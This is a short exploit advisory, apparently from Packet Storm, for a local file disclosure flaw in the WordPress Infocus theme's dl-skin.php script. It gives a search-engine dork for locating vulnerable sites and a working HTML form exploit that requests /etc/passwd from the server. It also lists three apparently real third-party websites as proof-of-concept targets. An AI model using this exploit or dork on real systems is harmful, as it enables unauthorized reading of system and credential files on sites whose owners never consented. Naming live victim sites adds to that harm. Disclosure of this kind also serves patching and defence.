WordPress Infocus theme suffers from a local file disclosure vulnerability.
1432547214d2a71e3e0a9f9575efc024ff820019e84a275b2039963c29f7f775[+] Post Local File Disclosure in wordpress theme Infocus
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/infocus/"
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
[+] PoC: http://www.sonorabehavioral.com/wp-content/themes/infocus/lib/scripts/dl-skin.php
http://www.harmonyhouse.uk.com/wp-content/themes/infocus/lib/scripts/dl-skin.php
http://foulaneautoecole.com/wp-content/themes/infocus/lib/scripts/dl-skin.php
eof
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed